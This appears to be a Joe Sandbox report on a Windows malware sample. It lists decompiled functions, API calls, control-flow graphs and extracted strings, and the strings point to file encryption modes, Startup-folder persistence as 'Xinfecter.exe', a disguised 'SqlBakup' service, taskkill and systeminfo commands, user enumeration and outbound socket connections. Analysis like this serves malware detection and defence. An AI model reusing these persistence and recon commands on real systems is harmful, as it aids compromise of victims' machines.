                                            • Part of subcall function 009D3DD0: LocalAlloc.KERNEL32(00000040,00000014), ref: 009D3E96
                                            • Part of subcall function 009D3DD0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 009D3EAA
                                            • Part of subcall function 009D3DD0: GetLengthSid.ADVAPI32(?), ref: 009D3EBB
                                            • Part of subcall function 009D3DD0: LocalAlloc.KERNEL32(00000040,00000010), ref: 009D3EC7
                                            • Part of subcall function 009D3DD0: InitializeAcl.ADVAPI32(00000000,00000010,00000002), ref: 009D3EDC
                                            • Part of subcall function 009D3DD0: AddAccessAllowedAce.ADVAPI32(?,00000002,00000003,?), ref: 009D3EF4
                                            • Part of subcall function 009D3DD0: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 009D3F0C
                                            • Part of subcall function 009C5D90: GlobalMemoryStatusEx.KERNEL32(21472377), ref: 009C5DAF
                                            • Part of subcall function 009C4500: NetUserEnum.NETAPI32(00000000,00000000,00000002,00000000,000000FF,00000000,?,?,21472377), ref: 009C4565
                                            • Part of subcall function 009C4500: NetApiBufferFree.NETAPI32(00000000), ref: 009C4606
                                            • Part of subcall function 009C4500: NetApiBufferFree.NETAPI32(00000000), ref: 009C4622
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: FileInitializeToken$AllocBufferCopyCurrentDescriptorErrorFreeLocalOpenProcessSecurityThread$AccessAllocateAllowedConsoleDaclDuplicateEnumGlobalLastLengthMemoryModeModuleNameStatusTitleUser
                                          • String ID: /f$" start= auto$" start=auto$","$"cmd.exe","$$$$$.PBF$:\Documents and Settings\$:\Users\$Dflt$Fast$INW15$Manual_Mini_Config$Mini_Config$Mini_Config$Version 5.$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe$\AppData\SysMain.sys$\Start Menu\Programs\Startup\Xinfecter.exe$user$asykat$asykat$c:\R_cfg.ini$dcdcf$k2ba8v$r1d8la$sc create SqlBakup binPath= "$taskkill /PID $tasklist /v /fo csv | findstr /i "dcdcf"$ver
                                          • API String ID: 2029459818-3490420541
                                          • Opcode ID: 44ecad99646357985f22d3e3eace6ea771a9cd06906b6a19b21efe6cbdc818dc
                                          • Instruction ID: e09f02d1d7eb00cecc730dc82da127db51a8863b4c8a1c131ffd9009519bb38e
                                          • Opcode Fuzzy Hash: 44ecad99646357985f22d3e3eace6ea771a9cd06906b6a19b21efe6cbdc818dc
                                          • Instruction Fuzzy Hash: B522C6749012889EDB25EBA0DD41BEEB7B8AF95304F1441E9E40A67293EF305F85CF52
                                          Function 009D1C90 Relevance: 54.5, APIs: 4, Strings: 26, Instructions: 1975COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 009C5920: PathIsNetworkPathA.SHLWAPI(?,00AAAABC,?,?,?,21472377), ref: 009C59A7
                                            • Part of subcall function 009C5920: __alloca_probe_16.LIBCMT ref: 009C59D7
                                            • Part of subcall function 009C5920: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,?,?,?,?,?,21472377), ref: 009C59F1
                                            • Part of subcall function 009C5920: GetDiskFreeSpaceExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,21472377), ref: 009C5A0C
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009D1D27
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009D1D35
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009D1D69
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009D1D77
                                            • Part of subcall function 009C38C0: GetComputerNameExW.KERNEL32(00000000,?,?,21472377,?), ref: 009C3941
                                            • Part of subcall function 009C38C0: DsRoleGetPrimaryDomainInformation.NETAPI32(00000000,00000001,?,?,00000000,?,?,?), ref: 009C39E0
                                            • Part of subcall function 009BAE10: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009BAE81
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$Path$ByteCharComputerDiskDomainFreeInformationIos_base_dtorMultiNameNetworkPrimaryRoleSpaceWide__alloca_probe_16std::ios_base::_
                                          • String ID: | $ ~$,d5$:\Users\$INW15$INW15$Microsoft$\AppData\S-inf.sys$_And_Netword_Drive_Size:$_Encryption_Mode:$_Fast_Mode$_Slow_Mode$___$user$api.ipify.org$echo %date%-%time%$f$hg3l,$n7t0$o8g9n$p2h6$s4e5y$systeminfo|find /i "original"$systeminfo|find /i "os name"$ver$w#G!
                                          • API String ID: 586396178-1000676990
                                          • Opcode ID: 6b633db0d9b88e883ef140be8c9053878bf9a729fa69902ccb92fbf01b4561c7
                                          • Instruction ID: fed93fe24a9662ef75ab0312eb95990fb82c0a5addc6ca77964f6dd2cde53248
                                          • Opcode Fuzzy Hash: 6b633db0d9b88e883ef140be8c9053878bf9a729fa69902ccb92fbf01b4561c7
                                          • Instruction Fuzzy Hash: 7213DE70D102989FEB25DB24CD85BEEBBB6AF91304F1081D9D0486B292DB755F88CF91
                                          Function 00A778DD Relevance: 34.7, APIs: 23, Instructions: 194processsynchronizationCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 6355 a778dd-a778e9 6356 a77903-a77907 6355->6356 6357 a778eb-a778fe call a659b3 call a65122 6355->6357 6356->6357 6359 a77909-a7790d 6356->6359 6371 a77af7-a77afa 6357->6371 6361 a7790f-a77917 call a659a0 6359->6361 6362 a77919-a7793e call a823d6 6359->6362 6361->6357 6369 a77957-a7798f call a7769a 6362->6369 6370 a77940-a77955 call a74d66 * 2 6362->6370 6377 a77991-a779af call a74d66 * 3 6369->6377 6378 a779b9-a779c0 6369->6378 6384 a779b2-a779b4 6370->6384 6377->6384 6379 a779c5-a77a16 call a659a0 call a58980 CreateProcessA 6378->6379 6380 a779c2-a779c4 6378->6380 6393 a77a3d-a77a43 6379->6393 6394 a77a18-a77a27 GetLastError call a6597d 6379->6394 6380->6379 6386 a77af5-a77af6 6384->6386 6386->6371 6397 a77afb-a77b02 call a60f95 6393->6397 6398 a77a49-a77a4b 6393->6398 6408 a77a30-a77a32 6394->6408 6409 a77a29-a77a2a CloseHandle 6394->6409 6399 a77a83-a77a86 6398->6399 6400 a77a4d-a77a6a WaitForSingleObject GetExitCodeProcess 6398->6400 6406 a77ac4-a77ac6 6399->6406 6407 a77a88-a77a8a 6399->6407 6403 a77a73-a77a75 6400->6403 6404 a77a6c-a77a6d CloseHandle 6400->6404 6410 a77a77-a77a78 CloseHandle 6403->6410 6411 a77a7e-a77a81 6403->6411 6404->6403 6412 a77acf-a77aef call a74d66 * 3 6406->6412 6413 a77ac8-a77ac9 CloseHandle 6406->6413 6414 a77a93-a77a95 6407->6414 6415 a77a8c-a77a8d CloseHandle 6407->6415 6416 a77a34-a77a3b CloseHandle 6408->6416 6417 a77aa0-a77ac2 call a74d66 * 3 6408->6417 6409->6408 6410->6411 6411->6417 6432 a77af1-a77af4 6412->6432 6413->6412 6419 a77a97-a77a98 CloseHandle 6414->6419 6420 a77a9e 6414->6420 6415->6414 6416->6417 6417->6432 6419->6420 6420->6417 6432->6386
                                          APIs
                                            • Part of subcall function 00A823D6: _free.LIBCMT ref: 00A823F8
                                          • _free.LIBCMT ref: 00A7794E
                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000), ref: 00A77A08
                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 00A77A18
                                          • __dosmaperr.LIBCMT ref: 00A77A1F
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00A77A2A
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00A77A35
                                          • WaitForSingleObject.KERNEL32(?,00000000,?,?,?,?,?,00000000,00000000), ref: 00A77A4F
                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00A77A5C
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00A77A6D
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00A77A78
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00A77A8D
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00A77A98
                                          • _free.LIBCMT ref: 00A77AA3
                                          • _free.LIBCMT ref: 00A77AAF
                                          • _free.LIBCMT ref: 00A77ABB
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00A77AC9
                                          • _free.LIBCMT ref: 00A77943
                                            • Part of subcall function 00A74D66: HeapFree.KERNEL32(00000000,00000000,?,00A7D5F8,?,00000000,?,00000000,?,00A7D89C,?,00000007,?,?,00A7DC90,?), ref: 00A74D7C
                                            • Part of subcall function 00A74D66: GetLastError.KERNEL32(?,?,00A7D5F8,?,00000000,?,00000000,?,00A7D89C,?,00000007,?,?,00A7DC90,?,?), ref: 00A74D8E
                                          • _free.LIBCMT ref: 00A77994
                                          • _free.LIBCMT ref: 00A7799F
                                          • _free.LIBCMT ref: 00A779AA
                                          • _free.LIBCMT ref: 00A77AD2
                                          • _free.LIBCMT ref: 00A77ADE
                                          • _free.LIBCMT ref: 00A77AEA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _free$CloseHandle$ErrorLastProcess$CodeCreateExitFreeHeapObjectSingleWait__dosmaperr
                                          • String ID:
                                          • API String ID: 4143445633-0
                                          • Opcode ID: a2e143b7e99881504c9c4ff01562362916fb64beff344a002d75c6e939ed3927
                                          • Instruction ID: 7057f72a3dea3f38c9ade45bce7e11b30c82da78c35407740c373e49601bb13c
                                          • Opcode Fuzzy Hash: a2e143b7e99881504c9c4ff01562362916fb64beff344a002d75c6e939ed3927
                                          • Instruction Fuzzy Hash: 1D617E72D04209ABEF21EFE4DD45AEEBB79EF44355F20C126F819A2151DB314B44CB61
                                          Function 009C3100 Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 349COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 6433 9c3100-9c317f call 9e9b40 6436 9c3182-9c318b 6433->6436 6436->6436 6437 9c318d-9c31a4 call 9e6c20 6436->6437 6440 9c31a7-9c31b0 6437->6440 6440->6440 6441 9c31b2-9c3244 call 9e80d0 * 2 6440->6441 6446 9c3278-9c3296 6441->6446 6447 9c3246-9c3258 6441->6447 6450 9c32cd-9c330b 6446->6450 6451 9c3298-9c32ad 6446->6451 6448 9c326e-9c3275 call a40c3c 6447->6448 6449 9c325a-9c3268 6447->6449 6448->6446 6449->6448 6453 9c3578 call a65132 6449->6453 6452 9c3310-9c3319 6450->6452 6455 9c32af-9c32bd 6451->6455 6456 9c32c3-9c32ca call a40c3c 6451->6456 6452->6452 6458 9c331b-9c336f call 9e6c20 call 9e80d0 6452->6458 6463 9c357d call a65132 6453->6463 6455->6453 6455->6456 6456->6450 6470 9c33a6-9c33c0 GetFileAttributesW 6458->6470 6471 9c3371-9c3386 6458->6471 6467 9c3582-9c3587 call a65132 6463->6467 6475 9c3400-9c340a GetFileAttributesW 6470->6475 6476 9c33c2-9c33d3 CreateDirectoryW 6470->6476 6473 9c339c-9c33a3 call a40c3c 6471->6473 6474 9c3388-9c3396 6471->6474 6473->6470 6474->6463 6474->6473 6479 9c340c-9c3417 CreateDirectoryW 6475->6479 6480 9c3441-9c3447 6475->6480 6477 9c33dc-9c33e1 CreateDirectoryW 6476->6477 6478 9c33d5-9c33da CreateDirectoryW 6476->6478 6482 9c33f6-9c33fe CreateDirectoryW 6477->6482 6483 9c33e3-9c33f4 CreateDirectoryW * 3 6477->6483 6478->6477 6484 9c3419-9c3428 CreateDirectoryW * 2 6479->6484 6485 9c342a 6479->6485 6486 9c3449-9c345b 6480->6486 6487 9c347b-9c3495 6480->6487 6482->6480 6483->6480 6491 9c3430-9c343a GetFileAttributesW 6484->6491 6485->6491 6492 9c345d-9c346b 6486->6492 6493 9c3471-9c3478 call a40c3c 6486->6493 6489 9c34c9-9c34e3 6487->6489 6490 9c3497-9c34a9 6487->6490 6496 9c34e5-9c34f7 6489->6496 6497 9c3513-9c352d 6489->6497 6494 9c34bf-9c34c6 call a40c3c 6490->6494 6495 9c34ab-9c34b9 6490->6495 6491->6480 6498 9c343c-9c343f CreateDirectoryW 6491->6498 6492->6467 6492->6493 6493->6487 6494->6489 6495->6467 6495->6494 6501 9c3509-9c3510 call a40c3c 6496->6501 6502 9c34f9-9c3507 6496->6502 6503 9c355d-9c3577 call a405bb 6497->6503 6504 9c352f-9c3541 6497->6504 6498->6480 6501->6497 6502->6467 6502->6501 6509 9c3553-9c355a call a40c3c 6504->6509 6510 9c3543-9c3551 6504->6510 6509->6503 6510->6467 6510->6509
                                          APIs
                                          • GetFileAttributesW.KERNEL32(?,AppData\,00000008,?,?,00AAB000,00000001,?,?,?,?,00000000), ref: 009C33B7
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 009C33CD
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 009C33D8
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 009C33DD
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 009C33E5
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 009C33ED
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 009C33F2
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 009C33FC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CreateDirectory$AttributesFile
                                          • String ID: :\Users\$AppData\$w#G!
                                          • API String ID: 689033430-4204657435
                                          • Opcode ID: 260a9708911df0c1bfc2607f3ae1d149d4cb8e8ebfdc87392ba37d34b9fa0ed6
                                          • Instruction ID: 4308e86f729a6232f17633249901471caa98e25e961aecbcd1d054087104f64e
                                          • Opcode Fuzzy Hash: 260a9708911df0c1bfc2607f3ae1d149d4cb8e8ebfdc87392ba37d34b9fa0ed6
                                          • Instruction Fuzzy Hash: B5D1B231E10248DBDB14DFA4CD85BAEBB72AF85304F20C64CE509AB2A1DB746B85CF51
                                          Function 009B8CB0 Relevance: 28.4, APIs: 11, Strings: 5, Instructions: 391networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 6515 9b8cb0-9b8e46 call a41740 call a289f6 call 9e8f40 call 9e1940 call 9e9720 call 9e1940 6528 9b8e48-9b8e57 6515->6528 6529 9b8e86-9b8ebd 6515->6529 6530 9b8e59-9b8e67 6528->6530 6531 9b8e6d-9b8e7e call a40c3c 6528->6531 6532 9b8ebf-9b8ece 6529->6532 6533 9b8eee-9b8f16 6529->6533 6530->6531 6536 9b9291 call a65132 6530->6536 6531->6529 6538 9b8ed0-9b8ede 6532->6538 6539 9b8ee4-9b8eeb call a40c3c 6532->6539 6534 9b8f18-9b8f27 6533->6534 6535 9b8f47-9b8f6f 6533->6535 6541 9b8f29-9b8f37 6534->6541 6542 9b8f3d-9b8f44 call a40c3c 6534->6542 6544 9b8f71-9b8f80 6535->6544 6545 9b8fa0-9b8fbc 6535->6545 6549 9b9296-9b929b call a65132 6536->6549 6538->6536 6538->6539 6539->6533 6541->6536 6541->6542 6542->6535 6551 9b8f82-9b8f90 6544->6551 6552 9b8f96-9b8f9d call a40c3c 6544->6552 6547 9b8fc3-9b8fcc 6545->6547 6547->6547 6553 9b8fce-9b905c WSAStartup socket gethostbyname htons connect 6547->6553 6551->6536 6551->6552 6552->6545 6557 9b905e-9b9064 6553->6557 6558 9b9066-9b906f call 9e1800 6553->6558 6557->6558 6561 9b9074-9b908f 6557->6561 6558->6561 6563 9b9095-9b909a 6561->6563 6563->6563 6564 9b909c-9b90c1 send 6563->6564 6565 9b916d-9b917f closesocket WSACleanup 6564->6565 6566 9b90c7-9b90ec call 9e1800 recv 6564->6566 6567 9b9185-9b918e 6565->6567 6566->6565 6573 9b90f2 6566->6573 6567->6567 6569 9b9190-9b9199 6567->6569 6571 9b919b-9b91aa 6569->6571 6572 9b91ca-9b91ed 6569->6572 6576 9b91ac-9b91ba 6571->6576 6577 9b91c0-9b91c7 call a40c3c 6571->6577 6574 9b91ef-9b91fa 6572->6574 6575 9b9202-9b9208 6572->6575 6578 9b90f8-9b90fc 6573->6578 6574->6575 6596 9b91fc-9b91fe 6574->6596 6579 9b920a-9b9216 6575->6579 6580 9b9232-9b924a 6575->6580 6576->6549 6576->6577 6577->6572 6582 9b90fe-9b9100 6578->6582 6583 9b9106-9b9112 6578->6583 6587 9b9228-9b922f call a40c3c 6579->6587 6588 9b9218-9b9226 6579->6588 6589 9b924c-9b9258 6580->6589 6590 9b9274-9b9290 call a405bb 6580->6590 6582->6583 6592 9b9102-9b9104 6582->6592 6584 9b912f-9b914c call 9eba60 6583->6584 6585 9b9114-9b9120 6583->6585 6584->6578 6593 9b9122 6585->6593 6594 9b9124-9b912d 6585->6594 6587->6580 6588->6549 6588->6587 6599 9b926a-9b9271 call a40c3c 6589->6599 6600 9b925a-9b9268 6589->6600 6592->6583 6601 9b914e-9b916b recv 6592->6601 6593->6594 6594->6578 6596->6575 6599->6590 6600->6549 6600->6599 6601->6565 6601->6573
                                          APIs
                                          • std::locale::_Init.LIBCPMT ref: 009B8D2C
                                            • Part of subcall function 00A289F6: __EH_prolog3.LIBCMT ref: 00A289FD
                                            • Part of subcall function 00A289F6: std::_Lockit::_Lockit.LIBCPMT ref: 00A28A08
                                            • Part of subcall function 00A289F6: std::locale::_Setgloballocale.LIBCPMT ref: 00A28A23
                                            • Part of subcall function 00A289F6: std::_Lockit::~_Lockit.LIBCPMT ref: 00A28A79
                                          • WSAStartup.WS2_32(00000202,?), ref: 009B8FDA
                                          • socket.WS2_32(00000002,00000001,00000006), ref: 009B8FFA
                                          • gethostbyname.WS2_32(?), ref: 009B9012
                                          • htons.WS2_32(00000E02), ref: 009B901F
                                          • connect.WS2_32(?,?,00000010), ref: 009B9054
                                          • send.WS2_32(?,?,?,00000000), ref: 009B90B9
                                          • recv.WS2_32(?,?,00002710,00000000), ref: 009B90E4
                                          • recv.WS2_32(?,?,00002710,00000000), ref: 009B9163
                                          • closesocket.WS2_32(?), ref: 009B916E
                                          • WSACleanup.WS2_32 ref: 009B9174
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Lockitrecvstd::_std::locale::_$CleanupH_prolog3InitLockit::_Lockit::~_SetgloballocaleStartupclosesocketconnectgethostbynamehtonssendsocket
                                          • String ID: Connection: close$ HTTP/1.1Host: $GET /$off$w#G!
                                          • API String ID: 928259667-3212753162
                                          • Opcode ID: 7cfedf7315ca7be982ccffd1daed01c081621300d88982fa5082827ef0711e92
                                          • Instruction ID: 93c86547da3d8ea167e9310e94c05bdda2059d6cc1a391d3e20efbe7e22b03da
                                          • Opcode Fuzzy Hash: 7cfedf7315ca7be982ccffd1daed01c081621300d88982fa5082827ef0711e92
                                          • Instruction Fuzzy Hash: 47F1C230A152599FEB29DF28CE48BDDBBB5EF45314F0081D9E508AB292CB759B84CF50
                                          Function 009DA6A0 Relevance: 22.6, APIs: 2, Strings: 10, Instructions: 1648COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 6607 9da6a0-9dbdbd call 9e7a00 call 9e6c20 * 2 call 9e12d0 call 9b8920 call 9e6c20 * 2 call 9e12d0 call 9b8920 call 9e6c20 * 2 call 9e12d0 call 9b8920 call 9e6c20 * 2 call 9e12d0 call 9b8920 call 9e8080 call a65132 call 9e1800 call a61700 6663 9dc10b-9dc111 6607->6663 6664 9dbdc3-9dbead call a61daa call a58980 call 9e8b80 call 9e7b00 call 9e8620 6607->6664 6665 9dc13b-9dc155 call a405bb 6663->6665 6666 9dc113-9dc11f 6663->6666 6694 9dbeaf-9dbec3 6664->6694 6695 9dbec5-9dbed1 6664->6695 6669 9dc131-9dc138 call a40c3c 6666->6669 6670 9dc121-9dc12f 6666->6670 6669->6665 6670->6669 6673 9dc160-9dc1ce call a65132 call a41740 GetConsoleWindow ShowWindow 6670->6673 6688 9dc269-9dc317 call 9e90a0 * 4 6673->6688 6689 9dc1d4-9dc20d call 9e1800 6673->6689 6738 9dc322-9dc329 6688->6738 6699 9dc210-9dc237 call 9e1940 * 2 6689->6699 6698 9dbed4-9dbef4 call 9b3740 call 9eafb0 6694->6698 6695->6698 6714 9dbfee-9dbffb 6698->6714 6715 9dbefa 6698->6715 6712 9dc239-9dc264 call 9e1c10 call 9d68a0 call 9e1ac0 6699->6712 6712->6738 6716 9dbffd-9dbfff 6714->6716 6717 9dc001-9dc025 call 9e7930 call a61daa 6714->6717 6720 9dbf00-9dbf17 6715->6720 6721 9dc028-9dc039 call 9e7a00 6716->6721 6717->6721 6725 9dbf19-9dbf1e 6720->6725 6726 9dbf36-9dbf75 call 9ea5b0 call 9c8240 6720->6726 6746 9dc03b-9dc060 call 9b3740 6721->6746 6747 9dc065-9dc0e1 call 9e47b0 call a28cbf 6721->6747 6732 9dbf24-9dbf34 6725->6732 6733 9dc156 call 9e8080 6725->6733 6759 9dbf87-9dbf8d call 9eb5f0 6726->6759 6760 9dbf77-9dbf85 call 9e12d0 6726->6760 6732->6720 6741 9dc15b call a65132 6733->6741 6744 9dc32f-9dc343 6738->6744 6745 9dc422-9dc44e call 9b8780 call 9e13c0 6738->6745 6741->6673 6753 9dc345-9dc348 6744->6753 6754 9dc382-9dc385 6744->6754 6778 9dc454-9dc50b call 9e13c0 * 2 call 9e1360 call 9e9040 call 9e9580 call 9e1ac0 * 2 call 9e1660 call 9b8780 call 9e1ac0 * 2 6745->6778 6779 9dc510-9dc852 call 9c2870 GetModuleFileNameW call 9e1260 call 9c36f0 call 9c3590 call 9e11d0 call 9b49c0 call 9e9b40 call 9e9c10 call 9e9ad0 call 9b49c0 * 2 call 9e1090 * 2 CopyFileW call 9e9b40 call 9e9c10 call 9e9ad0 call 9b49c0 * 2 call 9e1090 * 2 CopyFileW call 9e10a0 call 9e10c0 call 9ea4d0 call 9e8f40 call 9e9580 call 9e1ac0 call 9e8f40 call 9e9580 call 9e1ac0 call 9e1660 call 9b8780 call 9e1ac0 call 9e1660 call 9b8780 call 9e1ac0 call 9e10a0 call 9e10c0 call 9ea4d0 call 9e8f40 call 9e9580 call 9e1ac0 call 9e1660 call 9b8780 call 9e1ac0 call 9d3dd0 call 9b8780 call 9e13c0 call 9e12d0 call 9c3100 6745->6779 6746->6747 6747->6663 6780 9dc0e3-9dc0ef 6747->6780 6762 9dc350-9dc35a 6753->6762 6757 9dc387-9dc38a 6754->6757 6758 9dc3c2-9dc3c5 6754->6758 6764 9dc390-9dc39a 6757->6764 6765 9dc3fd-9dc41c SetErrorMode SetConsoleTitleW call 9c58e0 6758->6765 6766 9dc3c7-9dc3ca 6758->6766 6776 9dbf92-9dbf9c 6759->6776 6760->6776 6762->6762 6770 9dc35c-9dc37d 6762->6770 6764->6764 6772 9dc39c-9dc3bd 6764->6772 6765->6745 6790 9de585-9de5a2 call a405bb 6765->6790 6773 9dc3d0-9dc3da 6766->6773 6770->6754 6772->6758 6773->6773 6781 9dc3dc-9dc3f9 6773->6781 6783 9dbf9e-9dbfb0 6776->6783 6784 9dbfd0-9dbfe8 call 9eafb0 6776->6784 6778->6779 6917 9dc854-9dc85b 6779->6917 6918 9dc8b6-9dc8cb call 9c5d90 * 2 6779->6918 6787 9dc101-9dc108 call a40c3c 6780->6787 6788 9dc0f1-9dc0ff 6780->6788 6781->6765 6791 9dbfc6-9dbfcd call a40c3c 6783->6791 6792 9dbfb2-9dbfc0 6783->6792 6784->6714 6784->6720 6787->6663 6788->6741 6788->6787 6791->6784 6792->6741 6792->6791 6917->6918 6920 9dc85d-9dc864 6917->6920 6927 9dc8cd-9dc8ec call 9c5d90 * 2 6918->6927 6928 9dc8f2-9dca02 call 9e10a0 call 9e10c0 call 9ea4d0 call 9e1a90 call 9b8a80 call 9e11d0 call 9b49c0 call 9e10a0 call 9e10c0 call 9ea4d0 call 9b8a80 call 9e9d90 call 9e11d0 call 9b49c0 * 2 call 9c4500 call 9e12b0 6918->6928 6920->6918 6922 9dc866-9dc872 call 9eafa0 6920->6922 6922->6918 6929 9dc874-9dc8b3 call 9e12d0 * 2 call 9b92a0 6922->6929 6927->6928 6974 9dca04-9dca06 6928->6974 6929->6918 6975 9dca0c-9dcaca call 9e9b40 call 9e9c10 call 9e9ad0 call 9e11d0 call 9b49c0 * 3 call 9e12d0 call 9b4a20 call 9b49c0 6974->6975 6976 9dcad8-9dcb15 call 9e12d0 call 9b4a20 call 9b49c0 6974->6976 6975->6976 7043 9dcacc-9dcad3 6975->7043 6989 9dcb17-9dcb8d call 9e9b40 call 9e9c10 call 9e9ad0 call 9e11d0 call 9b49c0 * 3 6976->6989 6990 9dcb92-9dcbb5 call 9e9b40 6976->6990 6989->6990 6998 9dcbbc-9dcbf0 call 